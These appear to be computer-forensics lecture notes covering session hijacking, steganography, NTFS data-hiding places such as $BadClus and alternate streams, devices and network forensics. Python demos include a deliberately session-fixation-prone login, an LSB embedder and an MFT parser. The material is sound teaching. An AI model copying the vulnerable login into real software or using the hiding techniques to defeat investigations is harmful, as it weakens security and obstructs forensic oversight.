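The same parser can be pointed at the bytes of a real capture once the link-layer header has been stripped; the checksum check is what separates a genuinely malformed header from one an analyst has simply misaligned.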
Data transfer Ordered data transfer: the destination host rearranges segments according to their sequence numbers. Retransmission of lost packets: any part of the cumulative stream that is not acknowledged is retransmitted. Flow control: the receiver continually tells the sender how much data it can accept (the receive window), so the sender does not overrun the receiving host's buffer.
Congestion control The sender also limits its rate when it sees signs of congestion in the network, such as lost segments, so that the network as a whole is not overloaded.
Session hijacking
Session hijacking, also known as cookie hijacking, is the exploitation of a valid computer session, sometimes also called a session key, to gain unauthorized access to information or services in a computer system. Methods of hijacking: session fixation, session side-jacking, cross-site scripting.
Session fixation The attacker sets a user's session id to one known to him, for example by sending the user an email with a link that contains a particular session id. The attacker then only has to wait until the user logs in.
Session side-jacking The attacker uses packet sniffing to read the network traffic between two parties and steal the session cookie. This works when the site sends the cookie over unencrypted HTTP, for example on an open wireless network.
Cross-site scripting The attacker tricks the user's browser into running code that is treated as trustworthy because it appears to belong to the server, allowing the attacker to obtain a copy of the cookie.
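The three methods above as an added example (not from the original text, and not any particular framework's code): a toy server-side session store in Python with a fixation-prone login beside a hardened one that rotates the session id on authentication, and a Set-Cookie builder showing the attributes that blunt side-jacking and cookie theft by script. The user table and password are constructed for the demo.

```python
import hmac
import secrets

# Constructed credential table for the demo; a real system stores salted password hashes.
USERS = {"alice": b"correct horse battery staple"}


def check_password(user: str, password: str) -> bool:
    stored = USERS.get(user)
    return stored is not None and hmac.compare_digest(stored, password.encode())


class SessionStore:
    """Server-side session table: session id -> session data."""

    def __init__(self):
        self.sessions = {}

    def new(self) -> str:
        sid = secrets.token_urlsafe(32)      # 256 bits from the OS CSPRNG, not guessable
        self.sessions[sid] = {"user": None}
        return sid

    def get(self, sid):
        return self.sessions.get(sid)


def vulnerable_login(store, presented_sid, user, password):
    """Fixation-prone: whatever id the client presented (possibly planted by an attacker)
    is adopted, created if unknown, and bound to the authenticated user."""
    if not check_password(user, password):
        return None
    if presented_sid not in store.sessions:
        store.sessions[presented_sid] = {"user": None}
    store.sessions[presented_sid]["user"] = user
    return presented_sid


def hardened_login(store, presented_sid, user, password):
    """Rotate the session id on authentication: the pre-login id, which an attacker may
    already know, is discarded and a fresh random id is issued."""
    if not check_password(user, password):
        return None
    store.sessions.pop(presented_sid, None)
    sid = store.new()
    store.sessions[sid]["user"] = user
    return sid


def set_cookie_header(sid: str, hardened: bool = True) -> str:
    """Cookie attributes against the other two methods: Secure keeps the cookie off plaintext
    HTTP (side-jacking); HttpOnly keeps it out of document.cookie (cross-site scripting)."""
    attrs = ["session=" + sid, "Path=/"]
    if hardened:
        attrs += ["Secure", "HttpOnly", "SameSite=Lax"]
    return "Set-Cookie: " + "; ".join(attrs)


def fixation_succeeds(login) -> bool:
    """Simulate the attack: the attacker plants a known id (e.g. via a link in an e-mail),
    the victim logs in with it, and the attacker checks whether that id now carries the
    victim's identity."""
    store = SessionStore()
    planted = "attacker-chosen-id"
    login(store, planted, "alice", "correct horse battery staple")
    s = store.get(planted)
    return s is not None and s["user"] == "alice"


if __name__ == "__main__":
    print("vulnerable login fixated:", fixation_succeeds(vulnerable_login))
    print("hardened login fixated:  ", fixation_succeeds(hardened_login))
    print(set_cookie_header(SessionStore().new()))
```

Rotating the id is the fix for fixation; the cookie attributes are the fix for the other two. HttpOnly stops a script from reading the cookie, but not from making requests that the browser will attach the cookie to, so it reduces rather than removes the impact of cross-site scripting.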
Polymorphism
Polymorphism, in programming languages, is the provision of a single interface to entities of different types.
Polymorphism described Ad hoc polymorphism and parametric polymorphism were originally described in Fundamental Concepts in Programming Languages, a set of lecture notes written in 1967 by the British computer scientist Christopher Strachey.
Polymorphism types Ad hoc polymorphism, parametric polymorphism, polytypism.
Polytypic A polytypic function is more general than a polymorphic one: in such a function, "though one can provide fixed ad hoc cases for specific data types, an ad hoc combinator is absent".
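Ad hoc versus parametric polymorphism as an added Python example (not from the original text): describe() is one interface with a separate implementation registered per concrete type, while first() is a single implementation that works for every element type because it never inspects the elements.

```python
from functools import singledispatch
from typing import Sequence, TypeVar

T = TypeVar("T")


@singledispatch
def describe(value) -> str:
    """Ad hoc polymorphism: one name, a separate implementation per concrete type.
    This body is the fallback for types with no registered implementation."""
    return "unknown(%s)" % type(value).__name__


@describe.register
def _(value: bytes) -> str:
    return "bytes[%d] %s" % (len(value), value.hex())


@describe.register
def _(value: str) -> str:
    return "str(%d chars)" % len(value)


@describe.register
def _(value: int) -> str:
    return "int 0x%x" % value


def first(items: Sequence[T]) -> T:
    """Parametric polymorphism: the same code serves lists, strings, byte strings and
    any other sequence, whatever the element type T."""
    if not items:
        raise ValueError("empty sequence")
    return items[0]


if __name__ == "__main__":
    for v in (b"\x01\x02", "abc", 255, 1.5):
        print(describe(v))
    print(first([3, 1]), first("xyz"))
```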
Steganography
Steganography is the art or practice of concealing a message, image or file within another message, image or file.
About steganography The word is of Greek origin and means "covered writing" or "concealed writing".
Steganography advantage The advantage of steganography over cryptography alone is that an encrypted message, no matter how unbreakable, is plainly visible and draws attention, whereas a hidden message does not.
Physical techniques Hidden messages on a messenger's body were used in ancient Greece. Hidden messages on paper are written in secret inks, under other messages or on the blank parts of other messages.
Digital techniques Here the message is concealed within the lowest bits of noisy images or sound files. Hiding a message is also possible by changing the order of elements in a set.
Applications Steganography is used by some modern printers, including HP and Xerox brand colour laser printers, which add tiny yellow dots to each page encoding the printer's serial number and a timestamp.
Detection methods The following two methods are used to detect steganography: visual analysis and statistical analysis.
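Least-significant-bit embedding in an 8-bit carrier, as an added example (not from the original text): the embedder and extractor, plus the LSB-plane view an analyst uses for visual analysis and a change count for a first statistical look. The carrier is a constructed 512-sample ramp standing in for a strip of grayscale pixels.

```python
def embed(carrier: bytes, message: bytes) -> bytes:
    """Hide message in the least significant bit of successive carrier samples
    (8-bit pixel or audio values). A 32-bit big-endian length prefix lets the
    extractor know where the message ends."""
    payload = len(message).to_bytes(4, "big") + message
    bits = [(byte >> (7 - i)) & 1 for byte in payload for i in range(8)]
    if len(bits) > len(carrier):
        raise ValueError("carrier too small: %d samples needed, %d available" % (len(bits), len(carrier)))
    out = bytearray(carrier)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit      # each sample changes by at most 1
    return bytes(out)


def extract(stego: bytes) -> bytes:
    """Read the LSBs back: the length first, then that many bytes."""
    def read_bits(start: int, n: int) -> int:
        value = 0
        for i in range(start, start + n):
            value = (value << 1) | (stego[i] & 1)
        return value
    length = read_bits(0, 32)
    if 32 + 8 * length > len(stego):
        raise ValueError("length prefix exceeds carrier: not an LSB payload, or truncated")
    return bytes(read_bits(32 + 8 * k, 8) for k in range(length))


def lsb_plane(samples: bytes, width: int) -> list:
    """Visual analysis: render only the LSB of each sample as rows of '#' (1) and '.' (0).
    A natural image shows structure here; an embedded payload shows up as noise."""
    return ["".join("#" if b & 1 else "." for b in samples[r:r + width])
            for r in range(0, len(samples) - width + 1, width)]


def changed_samples(carrier: bytes, stego: bytes) -> int:
    """First statistical measure: how many samples differ between carrier and stego."""
    return sum(1 for a, b in zip(carrier, stego) if a != b)


# Constructed carrier: 512 samples of a smooth ramp (each value repeated 8 times),
# standing in for a strip of a grayscale image. Its LSB plane is a regular stripe pattern.
CARRIER = bytes((i // 8) & 0xFF for i in range(512))

if __name__ == "__main__":
    stego = embed(CARRIER, b"meet at dawn")
    print(extract(stego), changed_samples(CARRIER, stego), "samples changed")
    for before, after in zip(lsb_plane(CARRIER, 16)[:4], lsb_plane(stego, 16)[:4]):
        print(before, " -> ", after)
```

The bit-plane rows make the visual method concrete: the carrier's LSB plane repeats a clean stripe, and the rows covering the payload break that pattern. On a real image the same comparison is done against the expected smoothness of the picture rather than against a known original.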
Antiforensics
Anti-computer forensics is a general term for a set of techniques used as countermeasures to forensic analysis.
Anti-forensic tools In the past, anti-forensic tools have focused on attacking the forensic process by destroying data, hiding data, or altering data usage information such as file timestamps.
Anti-forensic effectiveness Anti-forensic methods rely on several weaknesses in the forensic process: the human element, dependency on tools, and the physical and logical limitations of computers.
Cloaking Techniques
Cloaking is a search engine optimization (SEO) technique in which the content presented to the search engine spider is different from that presented to the user's browser.
Uses of cloaking Cloaking is often used as a spamdexing technique to trick search engines into giving the site a higher ranking.
Data hiding Data hiding is the principle of segregating the design decisions in a computer program that are most likely to change, thus protecting other parts of the program from extensive modification.
Renaming files The mechanics differ for MS-DOS and Windows command-line users, Microsoft Windows users, and Linux and Unix users.
Data hiding on NTFS The aim is to detect and recover data hidden using each of the methods below.
Methodology and tools Tools for hiding data: Runtime's Disk Explorer for NTFS v2.31 (for everything except Alternate Data Streams, ADS). Tools for restoring data: Windows XP chkdsk and fsutil, Windows OEM Support Tools NFI, Sleuth Kit 2.02, Foremost 0.69, Come forth 1.00, and also dd, hexedit and strings.
Master File Table Every file and every directory has at least one entry in the MFT, including the MFT itself. Each entry in the MFT is called a file record and has a default fixed size of 1024 bytes. The first 42 bytes are reserved for the MFT entry header and the remaining bytes are used to store the attributes.
Clusters The data unit in NTFS is called a cluster; it is the smallest disk space allocation unit. Every cluster in NTFS has a Logical Cluster Number (LCN), starting with 0 for the first cluster. Clusters which belong to a file are also assigned a Virtual Cluster Number (VCN), starting with 0 for the file's first cluster.
Metadata files These describe the structure of the file system itself. Microsoft defined 16 standard MFT records (file numbers 0 to 15), some currently unused and reserved for future use.
Hiding data in $BadClus Defective sectors are handled in two ways: slipping, which modifies the Logical Block Number (LBN) to physical mapping to skip the defective sector, and remapping, which reallocates the LBN from the defective area to a spare sector. Clusters listed in $BadClus are never allocated to files, so marking good clusters as bad creates space that the file system will not touch and that the usual tools will not show as belonging to any file.
Hiding data in the $DATA attribute Hiding data in the $DATA attribute is possible for the metadata files except the directories and the extension metadata files. Except for $BadClus, the content of these attributes is used in NTFS operation, but it is possible to append some hidden data. Because the $DATA attribute is both read and written by NTFS, the appended data could be overwritten.
NTFS boot file ($Boot) This is the only file with a fixed location: it always starts at the first cluster of the file system.
Alternate Data Streams ADSs are a feature of NTFS introduced with Windows NT 3.1 (early 1990s) for compatibility between Windows NT servers and Macintosh clients using the Hierarchical File System (HFS), whose files carry a resource fork beside the data fork. A file can have any number of named $DATA streams in addition to its unnamed main stream; a standard directory listing shows only the main stream and its size, which is what makes ADSs a hiding place.
Directories A $DATA attribute is unnecessary for a directory, yet validation with chkdsk still passes when a directory contains one. As a result, the $DATA attribute in a directory can be used to hide data. Alternate data streams can also be created on directories, not just on data files.
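An added example (not from the original text or from any of the tools named above) of what a tool such as the Sleuth Kit does with a file record: build a constructed 1024-byte FILE record in Python, apply the update sequence (fixup) array the way NTFS writes it, then parse it back, verify the fixups, walk the attributes and report the two hiding places described above, named $DATA streams and a $DATA attribute on a directory. Offsets follow the on-disk MFT record and attribute headers; the file name, stream names and content are made up.

```python
import struct

SECTOR, RECORD_SIZE = 512, 1024
ATTR_STANDARD_INFORMATION, ATTR_FILE_NAME, ATTR_DATA, ATTR_END = 0x10, 0x30, 0x80, 0xFFFFFFFF


def resident_attr(atype, content, name=""):
    # 16-byte common header + 8-byte resident header, optional UTF-16LE name, content, padded to 8 bytes
    name_b = name.encode("utf-16-le")
    content_off = (0x18 + len(name_b) + 7) & ~7
    length = (content_off + len(content) + 7) & ~7
    hdr = struct.pack("<IIBBHHH", atype, length, 0, len(name), 0x18, 0, 0)   # type, len, non-res, name len/off, flags, id
    hdr += struct.pack("<IHBB", len(content), content_off, 0, 0)            # content size, content offset
    body = hdr + name_b
    return body + b"\x00" * (content_off - len(body)) + content + b"\x00" * (length - content_off - len(content))


def build_record(attrs, record_no, is_dir=False):
    # Constructed FILE record with the update sequence (fixup) array applied as NTFS writes it:
    # the last two bytes of every sector are replaced by the USN and the originals saved at 0x30.
    usa_off, usa_count = 0x30, 1 + RECORD_SIZE // SECTOR
    first_attr = (usa_off + 2 * usa_count + 7) & ~7
    body = b"".join(attrs) + struct.pack("<I", ATTR_END) + b"\x00" * 4
    flags = 0x01 | (0x02 if is_dir else 0)          # 0x01 in use, 0x02 directory
    header = struct.pack("<4sHHQHHHHIIQHHI", b"FILE", usa_off, usa_count, 0, 1, 1, first_attr,
                         flags, first_attr + len(body), RECORD_SIZE, 0, len(attrs) + 1, 0, record_no)
    rec = bytearray(header + b"\x00" * (first_attr - len(header)) + body)
    rec += b"\x00" * (RECORD_SIZE - len(rec))
    usn = b"\x07\x00"
    rec[usa_off:usa_off + 2] = usn
    for k in range(RECORD_SIZE // SECTOR):
        end = (k + 1) * SECTOR
        rec[usa_off + 2 * (k + 1):usa_off + 2 * (k + 2)] = rec[end - 2:end]
        rec[end - 2:end] = usn
    return bytes(rec)


def apply_fixups(rec):
    # Verify and undo the fixups: a sector not ending in the USN means a torn or externally edited record
    usa_off, usa_count = struct.unpack_from("<HH", rec, 4)
    usn = rec[usa_off:usa_off + 2]
    out = bytearray(rec)
    for k in range(usa_count - 1):
        end = (k + 1) * SECTOR
        if out[end - 2:end] != usn:
            raise ValueError("fixup mismatch in sector %d" % k)
        out[end - 2:end] = rec[usa_off + 2 * (k + 1):usa_off + 2 * (k + 2)]
    return bytes(out)


def fixups_ok(raw):
    try:
        apply_fixups(raw)
        return True
    except ValueError:
        return False


def parse_record(raw):
    if raw[:4] != b"FILE":
        raise ValueError("not an MFT FILE record")
    rec = apply_fixups(raw)
    attr_off, flags, used = struct.unpack_from("<HHI", rec, 0x14)
    attrs, off = [], attr_off
    while off + 8 <= used:
        atype, length = struct.unpack_from("<II", rec, off)
        if atype == ATTR_END:
            break
        if length < 0x18 or off + length > used:
            raise ValueError("bad attribute length at 0x%x" % off)
        nonres, name_len, name_off = struct.unpack_from("<BBH", rec, off + 8)
        name = rec[off + name_off:off + name_off + 2 * name_len].decode("utf-16-le")
        content = None                                # non-resident content lives in clusters; not followed here
        if nonres == 0:
            csize, coff = struct.unpack_from("<IH", rec, off + 0x10)
            content = rec[off + coff:off + coff + csize]
        attrs.append({"type": atype, "name": name, "resident": nonres == 0, "content": content})
        off += length
    return {"record": struct.unpack_from("<I", rec, 0x2C)[0], "in_use": bool(flags & 1),
            "directory": bool(flags & 2), "attrs": attrs}


def file_name(parsed):
    # $FILE_NAME: parent ref (8), four timestamps (32), two sizes (16), two flag words (8), name length at 64
    for a in parsed["attrs"]:
        if a["type"] == ATTR_FILE_NAME and a["content"]:
            return a["content"][66:66 + 2 * a["content"][64]].decode("utf-16-le")
    return ""


def findings(parsed):
    # The two hiding places from the text: named $DATA streams (ADS) and any $DATA on a directory
    out = []
    for a in parsed["attrs"]:
        if a["type"] == ATTR_DATA and a["name"]:
            out.append("alternate data stream %r (%d bytes)" % (a["name"], len(a["content"] or b"")))
        if a["type"] == ATTR_DATA and parsed["directory"]:
            out.append("directory carries a $DATA attribute")
    return out


def sample_record():
    # Constructed record for 'notes.txt' (made-up name and content) with a hidden ADS 'secret'
    fn = struct.pack("<Q", 5) + b"\x00" * 32 + struct.pack("<QQII", 8, 5, 0x20, 0)
    fn += bytes([len("notes.txt"), 1]) + "notes.txt".encode("utf-16-le")
    return build_record([resident_attr(ATTR_STANDARD_INFORMATION, b"\x00" * 48),
                         resident_attr(ATTR_FILE_NAME, fn),
                         resident_attr(ATTR_DATA, b"hello"),
                         resident_attr(ATTR_DATA, b"hidden payload", name="secret")], record_no=42)
```

Run against records carved from a real $MFT (each 1024 bytes, starting with "FILE"), the fixup check is the first thing to apply: a mismatch means the record was either torn by an interrupted write or edited with a hex editor that did not maintain the array, both of which are worth noting in an examination.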
Testing NTFS integrity Any error reported by the chkdsk command indicates that the file system could have been manipulated and left in an unstable state. The standard Windows utility fsutil, or the Sleuth Kit command fsstat, is the fastest way to obtain general information about the NTFS file system under investigation.
UNIT - 4 Hardware: Model System Platforms
Hardware: Model System Platforms 8/17/2015
Computer
What is a computer? A computer is basically a device that transforms data into meaningful information. Data can be anything, such as the marks you obtained in various subjects, or the name, age, sex, weight and height of all the students in a class.
Performance A computer can accept data, store data, process data as desired, retrieve the stored data and print the result in the desired format.
Basic operations The computer performs five major operations irrespective of its size and make: it accepts data or instructions by way of input, it stores data, it processes data as required by the user, it gives results in the form of output, and it controls all operations inside the computer.
Computer languages Low-level languages and high-level languages.
Peripheral devices The peripheral devices are input devices and output devices.
Input devices Keyboard, mouse, optical/magnetic scanner, touch screen, microphone for voice input.
Output devices Monitor (visual display unit), printer, speakers.
Power supplies DC-to-DC converters and DC-to-AC converters belong to the category of switched-mode power supplies (SMPS).
SMPS types DC-to-DC converter, forward converter, flyback converter, self-oscillating flyback converter.
Hard disk drive
A hard disk drive (HDD) is a data storage device that uses rapidly rotating disks (platters) coated with magnetic material to store and retrieve digital information.
Use of HDD An HDD retains its data even when powered off. Data is read in a random-access manner, meaning individual blocks of data can be stored or retrieved in any order rather than only sequentially.
Parts of HDD An HDD consists of one or more rigid ("hard") rapidly rotating platters with magnetic heads arranged on a moving actuator arm that reads and writes data to the surfaces.
History of HDD The HDD was introduced by IBM in 1956. HDDs became the dominant secondary storage device for general-purpose computers by the early 1960s.
New HDD technologies Heat-assisted magnetic recording, bit-patterned recording, shingled magnetic recording.
Hard drive components Head actuator, read/write actuator arm, read/write head, spindle, platter, disk controller.
Hard drive types There are two types of hard drives: external hard drives and internal hard drives.
HDD replaced by SSD Solid-state drives (SSDs) are starting to replace HDDs in many computers because of the advantages they have over HDDs, and they are becoming more and more popular. HDDs will continue to be used in desktop computers alongside SSDs because of the greater capacity HDDs offer. For a forensic examiner the difference matters: an SSD's controller can erase deleted blocks on its own (TRIM and wear levelling), so deleted data that would survive on an HDD may not be recoverable from an SSD.
Laptop
A laptop is a portable computer with a clamshell form factor, suitable for mobile use. Laptops are also sometimes called notebook computers or notebooks.
Uses of laptop Laptops are commonly used in a variety of settings, including work, education and personal multimedia.
Components of laptop A laptop combines the components and inputs of a desktop computer, including display, speakers, keyboard and a pointing device (such as a touchpad), into a single device.
History of laptop A "personal, portable information manipulator" was imagined by Alan Kay at Xerox PARC in 1968 and described in his 1972 paper as the "Dynabook".
Categories 3D, built for the classroom, gaming, built for business.
Major brands Acer, Dell, Lenovo.
Tablet computer
A tablet computer, or simply tablet, is a mobile computer with display, circuitry and battery in a single unit. Tablets are equipped with sensors, including cameras, a microphone and an accelerometer, and a touch screen operated with finger or stylus gestures. A computer mouse and keyboard can also be attached.
Touch interface A key component of tablet computers is touch input, which allows the user to navigate easily and to type with a virtual keyboard.
Touch screen types Resistive touch screens and capacitive touch screens.
What is a resistive touch screen? Resistive touch screens are passive and respond to pressure on the screen. They allow a high level of precision, useful in emulating a pointer, but may require calibration. Because of the high resolution, a stylus or fingernail is often used.
What is a capacitive touch screen? Capacitive touch screens tend to be less accurate but more responsive than resistive devices. Because they require a conductive material, such as a fingertip, for input, they are not common among stylus-oriented devices but are prominent on consumer devices.
Features Hardware: high-definition, anti-glare display; GPS satellite location; wireless internet connectivity (usually the Wi-Fi standard and optional mobile broadband).
Data storage On-board flash memory; ports for removable storage; cloud storage options for backup and syncing data across devices, which means that evidence from a tablet may also exist off the device.
Additional inputs Speech recognition, gesture recognition.
Types of operating system Android, BlackBerry OS, iOS, Linux, Windows.
Server A server is a system (software running on suitable computer hardware) that responds to requests across a computer network to provide a network service.
Typical computing servers Typical computing servers are database servers, file servers, mail servers, print servers, web servers, gaming servers and application servers.
Server operating systems Typical characteristics: a GUI that is not available or is optional; the ability to reconfigure and update both hardware and software without restarting; advanced backup facilities permitting regular and frequent online backups of critical data; flexible and advanced networking and automation capabilities; tight system security with advanced user, resource, data and memory protection. Examples: UNIX, and server services in Windows.
Types of servers Application server: a server dedicated to running certain software applications. Catalog server: a central search point for information across a distributed network. Communications server: a carrier-grade computing platform for communications networks. Compute server: a server intended for intensive computations, especially scientific ones. Database server: provides database services to other computer programs or computers. Fax server: provides fax services for clients. File server: provides remote access to files. Game server: a server that video game clients connect to in order to play online together.
Energy consumption In 2010, data centers (servers, cooling and other electrical infrastructure) were responsible for 1.1 to 1.5% of electrical energy consumption worldwide and 1.7 to 2.2% in the United States.
Size classes Rack server, tower server, miniature (home) server, mini rack server, blade server, mobile server, ultra-dense server, super server.
Server hacking The steps an attacker typically follows: learn a programming language, know your target, test the target, crack the password or authentication process, create a backdoor.
Server virtualization Server virtualization is the masking of server resources, including the number and identity of individual physical servers, processors and operating systems, from server users.
Virtual private servers The server administrator uses a software application to divide one physical server into multiple isolated virtual environments, also known as guests, instances, containers or emulations.
iPods
iPods use the Apple iTunes software to transfer music to the device. Using iTunes you can store a music library, rip music from CDs, and transfer photos, videos, games and small applications (when supported by the player), among many other features.
Invention The first line was released on October 23, 2001, about 8½ months after the Macintosh version of iTunes was released.
Current versions The ultra-compact iPod Shuffle, the compact iPod Nano, the touch-screen iPod Touch, and the hard-drive-based iPod Classic.
Uses iPods can serve as external data storage devices, which is why an investigator treats one like any other removable drive. Storage capacity varies by model, from 2 GB for the iPod Shuffle to 160 GB for the iPod Classic. Accessories: some accessories add features that other music players have built in, for example sound recorders, FM radio tuners, wired remote controls, and audio/visual cables for TV connections.
Software The iPod line can play several audio file formats, including MP3, AAC/M4A, Protected AAC, AIFF, WAV, Audible audiobook, and Apple Lossless.
Buttons The buttons perform basic functions such as menu, play, pause, next track, and previous track.
Reliability and durability A 2005 survey conducted on the MacInTouch website found that the iPod line had an average failure rate of 13.7%; the true iPod failure rate may be lower than it appears.
What is an MP3 player? An MP3 player is a type of digital audio player, falling under the broader category of portable media player (PMP) devices. It is a small handheld device, often weighing less than an ounce, that uses flash memory to store MP3 files.
PDA
A personal digital assistant (PDA), also known as a palmtop computer or personal data assistant, is a mobile device that functions as a personal information manager. PDAs are largely considered obsolete since the widespread adoption of smartphones.
First PDA The first PDA, the Organiser, was released in 1984 by Psion. It was followed by Psion's Series 3 in 1991, which began to resemble the more familiar PDA style and had a full keyboard.
Features Touch screen, memory cards, wired connectivity, wireless connectivity.
Touch screen in PDA Virtual keyboard, handwriting recognition.
Memory cards in PDA PDAs use microSD cards, which are electrically compatible with SD cards but have a much smaller physical size.
Wired connectivity Some early PDAs were able to connect to the Internet indirectly through an external modem connected via the PDA's serial port or "sync" connector, or directly by using an expansion card that provided an Ethernet port.
Wireless connectivity Many modern PDAs have Wi-Fi wireless network connectivity and can connect to Wi-Fi hotspots.
Operating systems The operating systems used on these devices include Palm OS, Android, iOS and webOS.
Palm OS Palm OS, also known as Garnet OS, is a mobile operating system initially developed by Palm, Inc. in 1996 for personal digital assistants (PDAs).
Design Palm OS is designed for ease of use, with a touch-screen-based graphical user interface.
Android Android is an operating system based on the Linux kernel and designed primarily for touch-screen mobile devices such as smartphones and tablet computers.
Android features Messaging, web browser, voice-based features, multi-touch, screen capture.
Additional features Video calling, multiple language support, accessibility.
Connectivity Bluetooth, tethering.
Media Streaming media support, media support, external storage.
Others Java support, handset layouts.
Digital Appliances
Washing machine A washing machine is a machine that washes laundry such as clothes and sheets. It is also called a laundry machine, clothes washer, or washer.
Washing machine parts Water inlet control valve, water pump, tub, agitator or rotating disc, motor, timer, printed circuit board (PCB), drain pipe.
Water inlet There is a water inlet control valve near the water inlet point of the washing machine. When you load the clothes, this valve opens and closes automatically, depending on the total quantity of water required.
Water pump The water pump circulates water through the washing machine. It works in two directions: it recirculates the water during the wash cycle and drains the water during the spin cycle.
Tub There are two tubs in the washing machine: inner and outer. The clothes are loaded into the inner tub, where they are washed, rinsed and dried; it has small holes for draining the water. The outer tub covers the inner tub and supports the various cycles of washing.
Agitator The agitator is located inside the tub and is the most important part of the washing machine: it actually performs the cleaning of the clothes.
Motor The motor is coupled to the agitator or the disc and produces the rotary motion. These are multi-speed motors whose speed can be changed as required. In a fully automatic washing machine the agitator speed changes automatically with the load.
Timer The timer lets the wash time be set manually. In automatic mode the time is set automatically, depending on the amount of clothes inside the machine.
PCB The PCB comprises the various electronic components and circuits. These act as a simple decision-making controller: they sense various external conditions and take decisions accordingly, which is why they are also called fuzzy logic systems. The PCB calculates the total weight of the clothes, and determines the quantity of water and detergent required and the total time required for washing.
Drain pipe The drain pipe removes the dirty water left over from washing.
Types There are two types of washing machines: top-loading and front-loading.
Top loading In this machine the clothes are loaded from the top, through a lid that allows loading and unloading. The top-loading washing machine is preferred by many people and is more widely used than the front-loading one.
Front loading In this machine the clothes are loaded from the front. Front-loading washing machines consume less electric energy, water and detergent, and give better washing results than top-loading ones. Top-loading machines are further classified as semi-automatic and fully automatic.
Semi-automatic washing machine It has separate tubs for the washer and the drier, with two separate timers for setting the washing and drying times. The user puts in sufficient water and detergent and then sets the timer.
Fully automatic washing machine There is only one tub, which serves as both washer and drier. Depending on the number or weight of the clothes, the machine takes in the right amount of water and detergent automatically, sets the timer for washing and drying, and does the rest on its own.
Manufacturers The top washing machine manufacturers are LG, Samsung, Videocon and Whirlpool.
Microwave oven A microwave oven, often colloquially shortened to microwave, is a kitchen appliance that heats food by bombarding it with electromagnetic radiation in the microwave spectrum, which causes polarized molecules in the food to rotate and build up thermal energy.
Uses Microwave ovens are used for reheating previously cooked food and for cooking vegetables. They are also useful for rapid heating of items that are otherwise slow to prepare, for example hot butter, fats and chocolate.
Principle of microwave oven A microwave oven heats food by passing microwave radiation through it. Microwaves are a form of non-ionizing electromagnetic radiation with a higher frequency than ordinary radio waves but lower than infrared light.
Heating efficiency A microwave oven converts only part of its electrical input into microwave energy. An average consumer microwave oven consumes 1100 W of electricity and produces 700 W of microwave power, an efficiency of about 64%.
Design A transformer or an electronic power converter passes energy to the magnetron; a high-voltage capacitor is connected to the magnetron transformer and, through a diode, to the chassis. A cavity magnetron converts the high-voltage electric energy to microwave radiation.
Safety Commercial microwave ovens all use a timer in their standard operating mode; when the timer runs out, the oven turns itself off.
Top manufacturers The top manufacturers of microwave ovens are Panasonic, Croma and Samsung.
Advantages Cooking with little or no oil; baking, which can be done only in an oven.
UNIT - 5 Software: Operating Systems, Network Traffic and Applications
Software: Operating Systems, Network Traffic and Applications 8/17/2015
Operating system
An operating system (OS) is a collection of software that manages computer hardware resources and provides common services for computer programs. Time-sharing operating systems schedule tasks for efficient use of the system and may also include accounting software for cost allocation of processor time, mass storage, printing and other resources.
Types of OS Real-time, multi-user, multi-tasking, distributed, templated, embedded.
Real-time OS A real-time operating system is a multitasking operating system that aims at executing real-time applications within guaranteed response times.
Multi-user OS A multi-user operating system allows multiple users to access a computer system at the same time.
Multi-tasking OS A multi-tasking operating system allows more than one program to run at the same time, from the point of view of human time scales.
Distributed OS A distributed operating system manages a group of independent computers and makes them appear to be a single computer.
Templated OS Templating, in a distributed and cloud computing context, refers to creating a single virtual machine image as a guest operating system and saving it as a template from which multiple virtual machines are run.
Embedded OS Embedded operating systems are designed for a specific purpose and are used in embedded computer systems.
Network traffic
Network traffic control is the process of managing, prioritizing, controlling or reducing the network traffic, particularly Internet bandwidth.
Uses In order to use these tools effectively, it is necessary to measure the network traffic to determine the causes of network congestion, and then attack those problems specifically.
BIOS
The fundamental purposes of the BIOS are to initialize and test the system hardware components. It helps to load a boot loader or an operating system. It occurs from a mass memory device. The BIOS of the original IBM PC/XT had no interactive user interface. Error messages were displayed on the screen. It is also coded in series of sounds. The sounds were generated to signal errors.
BIOS software BIOS software is stored on a nonvolatile ROM chip on the motherboard. It is specifically designed to work with each particular model of computer. It occurs by interfacing with various devices. Eventually the devices make up the complementary chipset of the system.
Boot devices The BIOS selects candidate boot devices using information collected by POST together with configuration information read from EEPROM, CMOS RAM or, in the earliest PCs, DIP switches. Option ROMs on expansion cards may also influence or supplant the boot process defined by the motherboard BIOS ROM.
Boot environment When the BIOS hands control to the boot program, the CPU is in real mode and the general-purpose and segment registers are undefined. The memory below address 0x000500 contains the interrupt vector table and the 256-byte BIOS data area, but the boot program must set up its own stack (or at least MS-DOS 6 behaves as if it must).
Network Forensic Analysis
Network forensic analysis takes traditional protocol analysis to the next level by extending the duration over which packets are captured: using current capture, storage and analysis technology, the analyzer retains traffic over long periods instead of a single live capture, so that what crossed the network before, during and after an event can be examined afterwards.
Applications The main application of network forensic analysis is optimizing network and application performance. Data center consolidation: network forensic analysis captures unexpected traffic patterns and isolates problems caused during the deployment of virtualization. Unified communications deployment: it evaluates the stability and quality of the deployment during the pilot and the first few weeks of operation, before the contractor warranty ends.
Analysis tool The mission of a network forensic analysis tool is to store the captured traffic and then analyze it for the information of interest.
Tool selection The criteria to weigh are performance, visibility, capacity, redundancy, ease of use and depth of analysis.
Performance What is the throughput to disk (not to memory) with no packet loss?
Visibility How many links can one recorder connect to, and what kind of topology can it link to? How much does turning on real-time monitoring or data analysis affect the throughput?
Capacity Is the storage figure quoted as raw storage, or as the real capacity available for data? Is there a way to filter or slice traffic so that only relevant data is stored?
Redundancy Is RAID 5 or RAID 10 used? If not, what happens when a hard disk fails: will data be lost, and how much work does it take to recover the system and/or the data?
Ease of use How difficult is it to analyze the captured network data? Can data collected from different parts of the network be easily aggregated? Can it be segmented and analyzed to get to the root cause?
Depth of analysis How many applications can the tool decode and support? Does it handle video and voice analysis? How fast is the analysis itself? Is there an easy way to analyze traffic across the whole network?
Collecting Data
While collecting data, the following matters need to be kept in mind: the relations between the data, the level of analysis required, and the sources.
Examining data The most effective way to begin a computer forensic investigation is to consult with the client first, in order to create a strategy for collecting, analyzing and processing the data.
Data preservation Electronic evidence, like other types of evidence, is fragile. Entering data, loading software, performing routine system maintenance, or simply booting a computer can alter or destroy certain files, which is why examiners work from a forensic image of the media, taken through a write blocker, rather than from the original.
Data collection Computer forensic experts can retrieve data from virtually all storage media and operating systems, including many antiquated systems. This covers retrieving data from seemingly inaccessible media, accessing active data on media, and recovering deleted data and/or deleted email.
Data Recovery The data recovery process is an important portion of the forensic analysis.
